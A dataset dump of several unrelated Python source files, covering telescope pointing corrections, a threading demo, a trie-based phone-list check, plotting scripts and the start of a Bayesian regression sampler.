IOLoop.instance().start()\n","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"81896770","text":"import threading \nimport time\nclass BookTicket:\n def __init__(self, total_seats):\n self.total_seats = total_seats\n self.l = threading.Lock()\n #self.l = threading.Seamphore()\n\n def processbooking(self, requestedSeats):\n print (threading.current_thread().getName())\n time.sleep(1)\n self.l.acquire()\n if self.total_seats+1 > requestedSeats:\n print (\"booking ticket\")\n print (\"confirming the seats\")\n print (\"print the ticket\")\n self.total_seats-= requestedSeats\n else:\n print (\"Sorry ! requested seats are not avaialble\")\n \n \n print (self.total_seats)\n self.l.release()\n\nbt= BookTicket(total_seats= 10)\nt1 = threading.Thread(target=bt.processbooking, args=(3,))\nt2 = threading.Thread(target=bt.processbooking, args=(5,))\nt3 = threading.Thread(target=bt.processbooking, args=(2,))\nt4 = threading.Thread(target=bt.processbooking, args=(2,))\n\nt1.start()\nt2.start()\nt3.start()\nt4.start()\n\n\n\n\n","sub_path":"python_threading/bookticket.py","file_name":"bookticket.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92286800","text":"import numpy as np\nimport pylab as py\nimport pickle as pk\nimport os\nimport copy\nimport glob\nimport spt3g.pointing.pointing_tools as pt\nfrom spt3g import core\n\n'''\n This module contains functions for obtaining a list of pointing parameters \n to pass to the offline and/or online pointing model.\n'''\n\ndef grabAzTiltParams(input_files, tilts_dir='/poleanalysis/sptdaq/azTilts'):\n '''\n Extract tilt parameters from the nearest tilt ObsID to this observations's ObsID.\n '''\n a2 = None\n a3 = None\n for fname in input_files:\n for frame in core.G3File(fname):\n #Extract the obsID of the frame.\n if frame.type == core.G3FrameType.Observation:\n obsID = frame['ObservationID']\n\n #Now track down which tilt obsID should be matched to this.\n dirs = glob.glob(os.path.join(tilts_dir,'*'))\n obslist = [int(f.split('/')[-1]) for f in dirs]\n obslist.sort()\n thisID = np.where(obslist >= obsID)[0][0]\n tilt_obsID1 = obslist[thisID]\n tilt_obsID2 = obslist[thisID+1]\n\n #Which tilt_obsID is closest to obsID?\n tilt_obs = np.array([tilt_obsID1, tilt_obsID2])\n diffs = obsID - tilt_obs\n\n index = np.where(diffs == np.min(diffs))[0]\n\n tilt_obsID = tilt_obs[index]\n\n #Now load tilt information from the relevant g3 file.\n info = [f for f in core.G3File(os.path.join(tilts_dir,str(tilt_obsID[0]), '0001.g3'))][0]\n tiltHA = info['tiltHA']/core.G3Units.degrees\n tiltLat = info['tiltLat']/core.G3Units.degrees\n\n #Now map the tilt values to pointing model parameters.\n a2 = 0.88*tiltHA\n a3 = -0.88*tiltLat\n break\n \n #Break the for loop once we have a2,a3\n if a2 != None:\n break\n\n return a2, a3\n\n\n#Online Az model given raw Az/El and pointing parameters) \ndef CorrectedAz(az, el, a2, a3, a4, a5, az0, DET=0,\n flags=['az_tilts', 'el_tilts',\n 'flexure', 'collimation',\n 'refraction']):\n d_az = -az0\n\n if 'az_tilts' in flags:\n d_az += (a2* np.cos(az/core.G3Units.rad) +\\\n a3 *np.sin(az/core.G3Units.rad))*np.tan(el/core.G3Units.rad)\n\n if 'el_tilts' in flags:\n d_az += a4*np.tan(el/core.G3Units.rad)\n\n if 'collimation' in flags:\n d_az += - a5/np.cos(el/core.G3Units.rad)\n\n\n if 'thermolin' in flags:\n d_az += -DET*np.tan(el/core.G3Units.rad)\n \n return az + d_az\n\n\n#Online El model given raw Az/El and pointing parameters, and refraction)\ndef CorrectedEl(az, el, a0, a1, a2, a3, a6, refraction,\n DEL = 0.0,\n flags=['az_tilts', 'el_tilts', 'flexure',\n 'collimation', 'refraction']):\n\n d_el = 0.\n\n if 'flexure' in flags:\n d_el += a0*np.sin(el/core.G3Units.rad) + a1*np.cos(el/core.G3Units.rad)\n\n if 'az_tilts' in flags:\n d_el += -(a2*np.sin(az/core.G3Units.rad) - a3*np.cos(az/core.G3Units.rad))\n\n if 'collimation' in flags:\n d_el += -a6\n\n if 'refraction' in flags:\n d_el += -refraction\n\n if 'thermolin' in flags:\n d_el += -DEL\n\n return el + d_el\n\n@core.indexmod\nclass CorrectBoresightPointing(object):\n '''\n Makes two timesteams (Az, El) that apply offsets\n from a given pointing model to environmental data to the specified\n raw encoder timestreams. Interpolates over pointing dropouts by default.\n\n The usual model choices are 'OnlinePointingModel' and 'OfflinePointingModel'\n and can reference dictionaries of parameters in any frame type.\n\n flags: list of pointing model segments to turn on. Default is everything\n in online model (no thermolin corrections).\n '''\n def __init__(self,\n raw_az_key = 'RawBoresightAz', raw_el_key = 'RawBoresightEl',\n output = 'OnlineBoresight', model = 'OnlinePointingModel',\n flags = ['az_tilts', 'el_tilts', 'flexure', 'collimation',\n 'refraction']):\n # XXX: contrary to documentation, does no interpolation\n self.raw_az_key = raw_az_key\n self.raw_el_key = raw_el_key\n self.output = output\n self.model_key = model\n self.flags = flags\n\n self.model = None # Will be filled later\n\n def __call__(self, frame):\n # Try to cache the model, wherever it appears\n if self.model_key in frame:\n self.model = frame[self.model_key]\n\n # Otherwise, ignore non-scan frames\n if frame.type != core.G3FrameType.Scan:\n return\n\n # Now get model params\n a0, a1 = self.model['flexure'][0:2]\n a2, a3, a4 = self.model['tilts'][0:3]\n a5, a6 = self.model['fixedCollimation'][0:2]\n az0 = frame['TrackerPointing'].encoder_off_x[0]\n refraction = np.median(frame['TrackerPointing'].refraction)\n\n p = {'a0':a0, 'a1':a1, 'a2':a2, 'a3':a3, 'a4':a4,\n 'a5':a5, 'a6':a6, 'az0':az0, 'refraction':refraction}\n\n # And apply corrections\n if 'thermolin' in self.flags:\n l1 = np.median(frame['TrackerPointing'].linsens_avg_l1)\n l2 = np.median(frame['TrackerPointing'].linsens_avg_l2)\n r1 = np.median(frame['TrackerPointing'].linsens_avg_r1)\n r2 = np.median(frame['TrackerPointing'].linsens_avg_r2)\n\n lin_data = get_lin_sens(l1, l2, r1, r2)\n p_thermolin = thermo2pointing(frame['TrackerPointing'].scu_temp, \n lin_data)\n\n p['DET'] = p_thermolin['DET']\n p['DEL'] = p_thermolin['DEL']\n else:\n p['DET'] = 0.0\n p['DEL'] = 0.0\n\n corrected_az = CorrectedAz(frame[self.raw_az_key],\n\t\t\t\t frame[self.raw_el_key],\n p['a2'], p['a3'], p['a4'], \n p['a5'], p['az0'], p['DET'], \n flags=self.flags)\n corrected_el = CorrectedEl(frame[self.raw_az_key],\n\t\t\t\t frame[self.raw_el_key],\n p['a0'], p['a1'], p['a2'], \n p['a3'], p['a6'], p['refraction'], p['DEL'],\n flags=self.flags)\n\n frame[self.output + 'Az'] = corrected_az\n frame[self.output + 'El'] = corrected_el\n\n\ndef TestThermolin(frame):\n '''\n Gather DET and DEL corretions for a given observation.\n '''\n if frame.type == core.G3FrameType.Scan:\n p = extractOfflinePointingParameters(frame)\n l1 = np.median(frame['TrackerPointing'].linsens_avg_l1)\n l2 = np.median(frame['TrackerPointing'].linsens_avg_l2)\n r1 = np.median(frame['TrackerPointing'].linsens_avg_r1)\n r2 = np.median(frame['TrackerPointing'].linsens_avg_r2)\n\n lin_data = get_lin_sens(l1, l2, r1, r2)\n p_thermolin = thermo2pointing(frame['TrackerPointing'].scu_temp, \n lin_data)\n\n p['DET'] = p_thermolin['DET']\n p['DEL'] = p_thermolin['DEL']\n\n frame['DET'] = core.G3Double(p['DET'])\n frame['DEL'] = core.G3Double(p['DEL'])\n \n\n\n#----------------------------------------------------------------------------------------\n#Below is code used to calculate collimation corrections based on scu temperature sensor\n#and yoke arm metrology readings.\n#This may or may not get replaced with the thermolin code RK wrote for use with EHT.\n#----------------------------------------------------------------------------------------\ndef get_lin_sens(l1, l2, r1, r2):\n \"\"\"\n Translated from the IDL get_lin_sens.pro written by RK.\n\n The purpose of this function is to return the linear sensor and thermometry sensor data\n from a given time window. Linearly interpolate over dropouts in the \n sensor data.\n \n INPUTS\n date: Array of dates.\n\n OUTPUTS\n S: a dictionary with the following substructures:\n 'utc': The 100 Hz UTC.\n 'l1': The 100 Hz L1 length, in mm.\n 'l2': The 100 Hz L2 length, in mm.\n 'r1': The 100 Hz R1 length, in mm.\n 'r2': The 100 Hz R2 length, in mm.\n 'del': The 100 Hz elevation correction, in arcseconds.\n 'daz': The 100 Hz azimuth correction, in arcseconds.\n 'det': The 100 Hz elevation tilt correction, in arcseconds.\n 'temp': The thermometry data, which is an array with [nthermos, nsamples].\n\n Translated: October 2012, JWH.\n Originally Written: April 2008, RK.\n Modifications: Take linear sensor data in place of the 'date' input. 7 Dec 2012, SH\n \"\"\"\n\n #Yoke dimensions in mm.\n Rs = 1652.\n Rh = 3556.\n Ry = 6782.\n\n #Calculate corrections in arcsec.\n DEL = (1./(2.*Rs))*(l2 - l1 + r2 - r1)*(3600.*180./np.pi)\n DAZ = (Rh/(Ry*Rs))*(l1 - l2 - r1 + r2)*(3600.*180./np.pi)\n DET = (1./(2.*Ry))*(r1 + r2 - l1 - l2)*(3600.*180./np.pi)\n\n #Subtract medians calculated from RCW38 observations.\n DAZ -= 0.0 #38.7\n DEL -= 0.0 #27.6\n DET -= 0.0 #18.6\n\n #Fill the output dictionary.\n s = {#'utc':utc, \n 'l1':l1, 'l2':l2, 'r1':r1, 'r2':r2,\n 'del':DEL, 'daz':DAZ, 'det':DET}\n\n return s\n\n\ndef thermo2pointing(scu_temp, this_lin, \n thermometry_config_file='thermometer_pointing_coefficients',\n nointerp=True):\n \"\"\"\n The purpose of this function is to provide pointing corrections DET and DEL, given an\n input array of structure thermometry and/or linear sensor data. The model is just linear \n in the thermometry + linear sensors. The coefficients for the model are stored in an \n external common txt file.\n\n INPUTS:\n scu_temp_in: the array of thermometry + linear sensor data. It has\n dimensions of (63, nsamples) where there are 60 thermometers\n and 3 linear sensors. The thermometry should be raw (degrees C).\n\n OUTPUTS:\n s - a dictionary with the following fields:\n DET: the DET (elevation axis tilt) correction, in arcseconds.\n DEL: the DEL (plain old elevation) correction, in arcseconds.\n\n\n EXCEPTIONS\n ValueError if the config file doesn't match the size of the scu_temp register data. \n\n Translated to python from the original IDL written by RK, Jan 2009.\n Translated by JWH October 2012.\n \"\"\"\n #scu_temp/=core.G3Units.K + 273.15\n\n scu_temp = np.median(np.reshape(scu_temp, (len(scu_temp)/60, 60)), axis=0)\n scu_temp = scu_temp/core.G3Units.K + 273.15\n\n scu_temp = np.hstack([scu_temp, this_lin['daz'], this_lin['del'], this_lin['det']])\n\n scu_temp = np.array([scu_temp]).T\n\n # Read in a config file that contains the coefficients for going from\n # structure temperatures to pointing offsets DET and DEL.\n index, det_coeff, del_coeff, neighbors1, neighbors2 = readThermoConfig()\n\n nsamples = scu_temp.shape[1]\n nthermo = scu_temp.shape[0]\n if nthermo != len(det_coeff)-1 or nthermo != len(del_coeff)-1:\n raise ValueError('# of thermometers in scu_temp does not match # of coefficients')\n\n #Interpolate over dropouts\n npts = nsamples\n thermo_zero = -200.0\n if nointerp==True and nsamples > 1:\n for i in range(nthermo-3):\n whnodrop1 = np.nonzero((scu_temp[i] != thermo_zero) &\n (scu_temp[i] != 0.0) &\n (scu_temp[i] > -150.) &\n (scu_temp[i] < 40.))[0]\n nnodrop = len(whnodrop1)\n if nnodrop < npts/2.:\n continue\n thisdata = scu_temp[i]\n thisdata = pt.interp_over_dropouts(thisdata, whnodrop=whnodrop1)\n scu_temp[i] = thisdata\n\n #The thermometer indexed in IDL by i=40 begain to have problems in 2011.\n #The cause of these problems are unknown, but basically the temperatures\n #that are recorded are crazy. This can screw up the pointing, since the \n #offline pointing model depends on the telescope temperatures. So if it's\n #2011 or later, and the i=40 thermometer looks crazy, let's replace its data\n #with that of a nearby thermometer, i=42.\n if (np.abs(np.median(scu_temp[40]) - np.median(scu_temp[42])) > 10.):\n scu_temp[40] = scu_temp[42]\n\n # Look through each thermometer, checking to see if there are any\n # which are still equal to the \"thermometer zero\" value, typically\n # -200.0 C, which were not interpolated over because there's no good\n # data to use for the interpolation. For these thermometers we want\n # to replace their output with that of their \"neighbors\", where \n # neighbor is defined as a thermometer that historically had a \n # similar temperature.\n scu_tempo = scu_temp.copy()\n for i in range(nthermo-3):\n this_temp = np.array(scu_temp[i]).reshape(len(scu_temp[i]))\n wh_zero = np.nonzero(this_temp == thermo_zero)[0]\n n_zero = len(wh_zero)\n if n_zero > 0:\n #This thermometer is returning the \"zero\" value. Replace its\n #data from that from its closest possible neighbor with similar data.\n this_n1 = neighbors1[i]\n this_temp_n = scu_temp[int(this_n1)]\n wh_zero_n = np.nonzero(this_temp_n == thermo_zero)[0]\n n_zero_n = len(wh_zero_n) \n if n_zero_n == 0:\n scu_temp[i] = this_temp_n\n else:\n this_n2 = neighbors2[i]\n this_temp_n = np.array(scu_temp[this_n2])\n wh_zero_n = np.nonzero(this_temp_n == thermo_zero)[0]\n n_zero_n = len(wh_zero_n)\n if n_zero_n == 0:\n scu_temp[i] = this_temp_n\n else:\n if (i<=25) or (i >= 40):\n pass\n wh_not_zero = np.nonzero(scu_tempo != thermo_zero)[0]\n n_not_zero = len(wh_not_zero)\n wh_not_zero = 0.\n if n_not_zero > 0:\n scu_temp[i] = ( np.zeros(len(scu_temp[i])) + \n np.median(scu_tempo[scu_tempo != thermo_zero]) )\n\n #Convert temps to Kelvin.\n scu_temp[0:60,0] += 273.15\n\n #Restructure the coefficients\n det_dc = det_coeff[-1]\n del_dc = del_coeff[-1]\n det_coeff = np.matrix(det_coeff[:-1])\n del_coeff = np.matrix(del_coeff[:-1])\n scu_temp = np.matrix(scu_temp)\n\n #Subtract off the median (calculated from 2014 RCW38 obs) so we have mean zero corrections.\n DET = np.array(det_coeff*scu_temp + det_dc) - 0.0 #-20.2\n DEL = np.array(del_coeff*scu_temp + del_dc) - 0.0 #-7.0\n\n\n #Return corrections in units of degrees.\n return {'DET':DET[0][0]/3600., 'DEL':DEL[0][0]/3600.}\n\n\ndef readThermoConfig(config_file='thermometer_pointing_coefficients.txt'):\n '''\n Read in thermometer pointing coefficients calculated originally by RK for SPT-SZ.\n It's probably a good idea to update these coefficients...\n '''\n d = open(os.path.join(os.path.dirname(os.path.realpath(__file__)), config_file), 'r').read().split('\\n')[:-1]\n \n index = []\n det_coeff = []\n del_coeff = []\n neighbors1 = []\n neighbors2 = []\n\n for i in range(len(d)):\n index.append(int(float(d[i].split(' ')[0])))\n det_coeff.append(float(d[i].split(' ')[1]))\n del_coeff.append(float(d[i].split(' ')[2]))\n neighbors1.append(int(float(d[i].split(' ')[3])))\n neighbors2.append(int(float(d[i].split(' ')[4])))\n\n return index, det_coeff, del_coeff, neighbors1, neighbors2\n\n@core.usefulfunc\ndef OfflinePointingParamsAtTime(t, config_files):\n '''\n Read SPTpol-style configuration text files and interpolate the values\n into an appropriately-formatted G3MapVectorDouble that can be placed into a\n frame for use by CorrectBoresightPointing.\n\n t should be either a G3Time or a string that the G3Time constructor can\n interpret.\n '''\n\n params = {}\n for fname in config_files:\n with open(fname, 'r') as f:\n # Can't figure out a way to parse these with numpy.loadtxt :(\n for line in f.readlines():\n if len(line[0].strip()) == 0:\n continue\n if line[0] == '#' and line[1] == '#':\n headers = line[2:].split()\n elif line.split()[0] == '#mjd':\n headers = line[1:].split()\n elif line[0] == '#':\n continue\n elif line.startswith('VALIDITY'):\n continue\n else:\n fields = {headers[i]: float(j) for i, j in\n enumerate(line.split())}\n if fields['mjd'] not in params:\n params[fields['mjd']] = {}\n params[fields['mjd']].update(fields)\n\n keys = {k for v in params.values() for k in v if k != 'mjd'}\n\n if isinstance(t, str):\n t = core.G3Time(t)\n desiredmjd = t.mjd\n p_at_t = {}\n\n for k in keys:\n mjd = []\n vals = []\n for datum in params.values():\n if k not in datum:\n continue\n mjd.append(datum['mjd'])\n vals.append(datum[k])\n p_at_t[k] = np.interp([desiredmjd], mjd, vals)[0]\n\n out = core.G3MapVectorDouble()\n if 'a0' in p_at_t:\n out['flexure'] = core.G3VectorDouble([p_at_t['a0'], p_at_t['a1']])\n if 'a2' in p_at_t:\n out['tilts'] = core.G3VectorDouble([p_at_t['a2'], p_at_t['a3'], p_at_t['a4']])\n if 'a5' in p_at_t:\n out['fixedCollimation'] = core.G3VectorDouble([p_at_t['a5'], p_at_t['a6']])\n if 'az0' in p_at_t:\n out['az0'] = core.G3VectorDouble([p_at_t['az0']])\n\n return out\n\n","sub_path":"pointing/offline_pointing.py","file_name":"offline_pointing.py","file_ext":"py","file_size_in_byte":17877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"609346333","text":"import HandTrackingModule as htm\r\n\r\nclass fingerCounter():\r\n def __init__(self):\r\n # Calls the HandTrackingModule and sets the tipIds to the tips of the fingers' ids\r\n self.detector = htm.handDetector(maxHands=1)\r\n self.tipIds = [4, 8, 12, 16, 20]\r\n\r\n def getFingerCount(self, img, draw=True, thumb_con=-10):\r\n \r\n # Get the finger positions and the img\r\n lmList,img = self.detector.findPosition(img, draw=True if draw == True else False)\r\n\r\n fingers = []\r\n if len(lmList) != 0:\r\n fingers = []\r\n\r\n # Thumb\r\n # Checks if the x coordinate of tip of the thumb is smaller than the x coordinate of the tip of the little\r\n # finger. its used to check if my hand is facing towards the cam or not\r\n if lmList[self.tipIds[0]][1] > lmList[self.tipIds[4]][1]:\r\n\r\n # If the hand is not facing the camera it checks if the tip of the thumb's x coordinate - bone under\r\n # the tip of the thumb's x coordinate is smaller than 15\r\n if lmList[self.tipIds[0]-1][1] - lmList[self.tipIds[0]][1] < thumb_con:\r\n fingers.append(1)\r\n else:\r\n fingers.append(0)\r\n else:\r\n\r\n # If the hand is facing the camera it checks if the tip of the thumb's x coordinate - bone under\r\n # the tip of the thumb's x coordinate is bigger than 15\r\n if lmList[self.tipIds[0]-1][1] - lmList[self.tipIds[0]][1] > thumb_con:\r\n fingers.append(1)\r\n else:\r\n fingers.append(0)\r\n\r\n # 4 Fingers\r\n for id in range(1, 5):\r\n try:\r\n # If the y of tip of the finger is smaller than the lowest bone of the finger\r\n if lmList[self.tipIds[id]][2] < lmList[self.tipIds[id] - 2][2]:\r\n fingers.append(1)\r\n else:\r\n fingers.append(0)\r\n except IndexError:\r\n pass\r\n\r\n # Return the finger array and the image array\r\n return (fingers,img)\r\n","sub_path":"Pyhton/FingerCounterModule.py","file_name":"FingerCounterModule.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534239304","text":"import csv\nimport re\nimport datetime\nfrom collections import defaultdict, namedtuple\n\nDATA = 'days/04-06-collections/D6/BIO1101-intra.csv'\n\nStudent = namedtuple('Student', 'time score question')\n\ndef get_score_by_question():\n \"\"\"Extracts all students form the datafile. For each question, get\n a list of all score on 100.\n\n Args:\n file (str): datafile\n Return:\n dictionary\n \"\"\"\n headers = []\n scores_question = defaultdict(list)\n mean_score_by_question = {}\n with open(DATA, encoding='utf-8') as f:\n csvin = csv.reader(f)\n headers = next(csvin)\n with open(DATA, encoding='utf-8') as f:\n for line in csv.DictReader(f):\n for h in headers:\n try:\n q = re.search('^Q..[0-9]{1,2}',h).group(0)\n brut = float(line[h])\n t = float(h[-4:])\n rel_score = brut/t\n except (ValueError, AttributeError):\n continue\n scores_question[q].append(rel_score)\n for q, s in scores_question.items():\n mean_score_by_question[q] = round(sum(s)/len(s)*100, 2)\n return {key: value for key, value in sorted(mean_score_by_question.items(), key=lambda item: item[1])}\n\n\ndef time_spent():\n liste_temps = []\n with open(DATA, encoding='utf-8') as f:\n for line in csv.DictReader(f):\n try:\n t = datetime.datetime.strptime(line['Temps utilisé'], '%H heures %M min').time()\n secondes = (t.hour * 60 + t.minute) * 60\n except ValueError:\n continue\n liste_temps.append(secondes)\n print(datetime.timedelta(seconds=sum(liste_temps)/len(liste_temps)))\n\n\nif __name__ == \"__main__\":\n scores_by_question = get_score_by_question()\n for q, s in scores_by_question.items():\n print(f'{q}\\t{s}')\n time_spent()","sub_path":"days/04-06-collections/D6/intra_stats.py","file_name":"intra_stats.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"532847139","text":"#전화번호 목록\nimport sys\n\nclass node:\n def __init__(self,key,data=None):\n self.key = key\n self.data = data\n self.child = {}\n\nclass trie:\n def __init__(self):\n self.head = node(None)\n\n def insert(self,string):\n cur_node = self.head\n\n for char in string:\n if char not in cur_node.child:\n cur_node.child[char] = node(char)\n cur_node = cur_node.child[char]\n if cur_node.data != None:\n return False\n\n cur_node.data = string\n if cur_node.child:\n return False\n return True\n\nN = int(sys.stdin.readline())\n\nfor _ in range(N):\n trie1 = trie()\n M = int(sys.stdin.readline())\n ans = True\n for _ in range(M):\n A = str(sys.stdin.readline().rstrip())\n temp = trie1.insert(A)\n if temp == False:\n ans = False\n if ans:\n print(\"YES\")\n else:\n print(\"NO\")\n","sub_path":"Python/7주차_트라이/정글_7_5052.py","file_name":"정글_7_5052.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"210257528","text":"#!/usr/bin/env python\n\n\"\"\"\nFor each of the OzFlux/FLUXNET2015 sites, plot the TXx and T-4 days\nQle and bowen ratio\n\nThat's all folks.\n\"\"\"\n\n__author__ = \"Martin De Kauwe\"\n__version__ = \"1.0 (20.04.2018)\"\n__email__ = \"mdekauwe@gmail.com\"\n\nimport os\nimport sys\nimport glob\nimport netCDF4 as nc\nimport numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport re\nimport constants as c\n\ndef main(fname):\n\n plot_dir = \"plots\"\n if not os.path.exists(plot_dir):\n os.makedirs(plot_dir)\n\n df = pd.read_csv(fname)\n df = df[df.pft == \"EBF\"]\n ignore_sites = [\"Tumbarumba\"]\n for site in ignore_sites:\n df = df.drop( df[(df.site == site)].index )\n #width = 12.0\n #height = width / 1.618\n #print(width, height)\n #sys.exit()\n width = 14\n height = 10\n fig = plt.figure(figsize=(width, height))\n fig.subplots_adjust(hspace=0.05)\n fig.subplots_adjust(wspace=0.05)\n plt.rcParams['text.usetex'] = False\n plt.rcParams['font.family'] = \"sans-serif\"\n plt.rcParams['font.sans-serif'] = \"Helvetica\"\n plt.rcParams['axes.labelsize'] = 14\n plt.rcParams['font.size'] = 14\n plt.rcParams['legend.fontsize'] = 10\n plt.rcParams['xtick.labelsize'] = 14\n plt.rcParams['ytick.labelsize'] = 14\n\n\n count = 0\n sites = np.unique(df.site)\n for site in sites:\n site_name = re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", site)\n ax = fig.add_subplot(3,3,1+count)\n\n df_site = df[df.site == site]\n events = int(len(df_site)/4)\n\n cnt = 0\n for e in range(0, events):\n\n from scipy import stats\n x = df_site[\"temp\"][cnt:cnt+4]\n y = df_site[\"GPP\"][cnt:cnt+4]\n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n #print(site, slope, p_value)\n if slope < 0.0 and p_value <= 0.05:\n ax.plot(df_site[\"temp\"][cnt:cnt+4], df_site[\"GPP\"][cnt:cnt+4],\n label=site, ls=\"-\", marker=\"o\", zorder=100)\n elif slope < 0.0 and p_value > 0.05:\n ax.plot(df_site[\"temp\"][cnt:cnt+4], df_site[\"GPP\"][cnt:cnt+4],\n label=site, ls=\"-\", marker=\"o\", color=\"lightgrey\",\n zorder=1)\n cnt += 4\n\n if count == 0:\n ax.set_ylabel(\"GPP (g C m$^{-2}$ d$^{-1}$)\", position=(0.5, 0.0))\n if count == 4:\n #ax.set_xlabel('Temperature ($^\\circ$C)', position=(1.0, 0.5))\n ax.set_xlabel('Temperature ($^\\circ$C)')\n\n if count < 3:\n plt.setp(ax.get_xticklabels(), visible=False)\n\n if count != 0 and count != 3:\n plt.setp(ax.get_yticklabels(), visible=False)\n\n props = dict(boxstyle='round', facecolor='white', alpha=1.0,\n ec=\"white\")\n ax.text(0.04, 0.95, site_name,\n transform=ax.transAxes, fontsize=14, verticalalignment='top',\n bbox=props)\n\n from matplotlib.ticker import MaxNLocator\n ax.yaxis.set_major_locator(MaxNLocator(4))\n ax.set_ylim(0, 15)\n ax.set_xlim(15, 50)\n count += 1\n\n\n ofdir = \"/Users/mdekauwe/Dropbox/fluxnet_heatwaves_paper/figures/figs\"\n fig.savefig(os.path.join(ofdir, \"all_events_GPP_CABLE.pdf\"),\n bbox_inches='tight', pad_inches=0.1)\n #plt.show()\n\nif __name__ == \"__main__\":\n\n data_dir = \"outputs/\"\n fname = \"ozflux_all_events_CABLE.csv\"\n fname = os.path.join(data_dir, fname)\n main(fname)\n","sub_path":"src/plot_GPP_at_all_events_above_Tthreh_CABLE.py","file_name":"plot_GPP_at_all_events_above_Tthreh_CABLE.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"635129462","text":"import io\r\nimport os\r\nimport sys\r\nfrom PIL import Image, ImageDraw, ExifTags, ImageColor\r\nfrom paramiko_conn import connection\r\n\r\ndef detect_lines(photo):\r\n\r\n fill_red='#ff0000'\r\n line_width=10\r\n\r\n\r\n image = Image.open(open(photo,'rb'))\r\n stream = io.BytesIO()\r\n image.save(stream, format=image.format) \r\n image_binary = stream.getvalue()\r\n imgWidth, imgHeight = image.size \r\n draw = ImageDraw.Draw(image) \r\n\r\n ox = connection(photo)\r\n for box in ox: \r\n left = imgWidth * box['Left']\r\n top = imgHeight * box['Top']\r\n width = imgWidth * box['Width']\r\n height = imgHeight * box['Height']\r\n points = (\r\n (left,top),\r\n (left + width, top),\r\n (left + width, top + height),\r\n (left , top + height),\r\n (left, top)\r\n )\r\n draw.line(points, fill=fill_red, width=line_width)\r\n\r\n image.show()\r\n\r\ndef main():\r\n\r\n photo = sys.argv[1]\r\n detect_lines(photo)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"client-side/draw_line.py","file_name":"draw_line.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"468169326","text":"import numpy as np\nimport scipy as sp\nimport scipy.stats\nimport scipy.linalg\nimport scipy.sparse\nimport math\nimport time\nimport pdb\nfrom .util.simple_warnings import warn_message_only\nfrom .random import BasicRandom\nfrom .reg_coef_sampler import SparseRegressionCoefficientSampler\nfrom .design_matrix import SparseDesignMatrix, DenseDesignMatrix\n\n\nclass BayesBridge():\n\n def __init__(self, y, X, n_trial=None, model='linear',\n n_coef_without_shrinkage=0, prior_sd_for_unshrunk=float('inf'),\n add_intercept=True):\n \"\"\"\n Params\n ------\n y : vector\n X : numpy array or scipy sparse matrix\n n_trial : vector\n Used for the logistic model for binomial outcomes.\n model : str, {'linear', 'logit'}\n n_coef_without_shrinkage : int\n The number of predictors whose coefficients are to be estimated\n without any shrinkage (a.k.a. regularization).\n prior_sd_for_unshrunk : float, numpy array\n If an array, the length must be the same as n_coef_without_shrinkage.\n \"\"\"\n\n # TODO: Make each MCMC run more \"independent\" i.e. not rely on the\n # previous instantiation of the class. The initial run of the Gibbs\n # sampler probably depends too much the stuffs here.\n\n if not (np.isscalar(prior_sd_for_unshrunk)\n or n_coef_without_shrinkage == len(prior_sd_for_unshrunk)):\n raise ValueError('Invalid array size for prior sd.')\n\n if add_intercept:\n X, n_coef_without_shrinkage, prior_sd_for_unshrunk = \\\n self.add_intercept(X, n_coef_without_shrinkage, prior_sd_for_unshrunk)\n\n if model == 'logit':\n if n_trial is None:\n self.n_trial = np.ones(len(y))\n warn_message_only(\n \"The numbers of trials were not specified. The binary \"\n \"outcome is assumed.\"\n )\n else:\n self.n_trial = n_trial\n\n if np.isscalar(prior_sd_for_unshrunk):\n self.prior_sd_for_unshrunk = prior_sd_for_unshrunk \\\n * np.ones(n_coef_without_shrinkage)\n else:\n self.prior_sd_for_unshrunk = prior_sd_for_unshrunk\n self.n_unshrunk = n_coef_without_shrinkage\n self.model = model\n self.y = y\n self.X = SparseDesignMatrix(X) if sp.sparse.issparse(X) else DenseDesignMatrix(X)\n self.n_obs = X.shape[0]\n self.n_pred = X.shape[1]\n self.prior_type = {}\n self.prior_param = {}\n self.set_default_priors(self.prior_type, self.prior_param)\n self.rg = BasicRandom()\n\n def add_intercept(self, X, n_coef_without_shrinkage, prior_sd_for_unshrunk):\n if sp.sparse.issparse(X):\n hstack = sp.sparse.hstack\n else:\n hstack = np.hstack\n X = hstack((np.ones((X.shape[0], 1)), X))\n n_coef_without_shrinkage += 1\n if not np.isscalar(prior_sd_for_unshrunk):\n prior_sd_for_unshrunk = np.concatenate((\n [float('inf')], prior_sd_for_unshrunk\n ))\n return X, n_coef_without_shrinkage, prior_sd_for_unshrunk\n\n def set_default_priors(self, prior_type, prior_param):\n prior_type['global_shrinkage'] = 'jeffreys'\n # prior_type['global_shrinkage'] = 'half-cauchy'\n # prior_param['global_shrinkage'] = {'scale': 1.0}\n return prior_type, prior_param\n\n def gibbs_additional_iter(\n self, mcmc_output, n_iter, merge=False, deallocate=False):\n \"\"\"\n Continue running the Gibbs sampler from the previous state.\n\n Parameter\n ---------\n mcmc_output : the output of the 'gibbs' method.\n \"\"\"\n\n if merge and deallocate:\n warn_message_only(\n \"To merge the outputs, the previous one cannot be deallocated.\")\n deallocate = False\n\n self.rg.set_state(mcmc_output['_random_gen_state'])\n\n init = {\n key: np.take(val, -1, axis=-1).copy()\n for key, val in mcmc_output['samples'].items()\n }\n if 'precond_blocksize' in mcmc_output:\n precond_blocksize = 